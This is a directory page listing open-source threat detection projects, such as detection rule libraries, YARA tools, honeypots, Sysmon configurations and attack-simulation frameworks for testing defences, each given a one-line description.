Threat Detection
Showing 36 of 86 projects
A library of portable detection tests mapped to the MITRE ATT&CK framework for security testing.
A generic and open signature format for describing log event detections, shareable across SIEM systems.
A curated list of awesome honeypot resources, tools, and related components for cybersecurity research and defense.
A pattern-matching tool for malware researchers to identify and classify malware samples using custom rules.
A cloud native runtime security tool for Linux that detects abnormal behavior and security threats in real-time.
A malicious traffic detection system that monitors network traffic for blacklisted threats and suspicious activities using public feeds and heuristics.
A high-quality, commented Sysmon configuration template for Windows system monitoring and incident investigation.
Open source CNAPP that hunts for threats in cloud native platforms, ranks them by risk, and visualizes attack paths.
A curated list of awesome open-source tools, detection rules, datasets, and resources for threat detection and hunting.
A curated list of awesome YARA rules, tools, and resources for malware researchers and security professionals.
A security tool that visualizes and analyzes Windows Active Directory event logs to investigate malicious logon activity.
A modular repository of Sysmon configuration modules for customizable endpoint detection and logging.
A modular, low-resource network honeypot that mimics services to detect breaches and alert on attacker interactions.
A Windows Batch script toolset that simulates Advanced Persistent Threat (APT) attack indicators to test security monitoring and detection capabilities.
A public repository for developing, testing, and maintaining detection rules for Elastic Security's SIEM, with tools for Detections as Code.
A collection of 200 Windows EVTX event log samples mapped to MITRE ATT&CK techniques for detection testing and threat hunting.
A Windows security tool for real-time adversary tradecraft detection, memory scanning, and forensics via behavior-driven rules.
A secure low-code honeypot framework that uses AI to create high-interaction decoy systems for cyber attack detection and analysis.
A suite of network fingerprinting standards for TLS, TCP, HTTP, SSH, and other protocols to facilitate threat detection and security analysis.
A Python tool that generates YARA rules for malware detection by filtering out strings and opcodes that appear in goodware.
An open source, serverless security data lake for AWS that normalizes logs, enables detection-as-code, and supports petabyte-scale threat hunting.
An open-source repository of security detections, analytic stories, and response playbooks mapped to MITRE ATT&CK for Splunk Enterprise Security.
A Linux distribution for network detection and response (NDR) built around Suricata, providing a complete NDR platform.
Open-source detection logic (rules, YARA, EQL) for Elastic Security's endpoint protection against malware, ransomware, and advanced threats.
Open-source detection logic (rules, YARA, ransomware protection) for Elastic Security's endpoint protection platform.
A lightweight utility to generate malicious network traffic patterns for evaluating security controls and network visibility.
A libpcap-based package for extracting and analyzing network flow data in JSON format for security research and monitoring.
An extensible open-source framework for running, monitoring, and managing honeypots to detect and analyze cyber threats.
A curated list of resources, tools, and frameworks for detection engineering in cybersecurity.
A CI/CD security agent that monitors GitHub Actions runners for threats like network egress, file integrity, and process activity.
A lightweight Certificate Transparency log monitor that alerts you when SSL/TLS certificates are issued for your domains.
A framework of Python scripts for blue teams to test detection capabilities against malicious tradecraft modeled after MITRE ATT&CK.
An open-source blue team tool that protects Linux and Windows systems via honeypots, monitoring, and alerting.
A framework for developing rigorous, documented alerting and detection strategies to improve incident response efficacy.
A centralized platform for security monitoring and analysis, integrating big data technologies for log aggregation, threat detection, and behavioral analytics.
A standalone Python tool for applying SIGMA detection rules to EVTX, Auditd, Sysmon for Linux, and other log formats.
Related Tags
Found a gem we're missing?
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.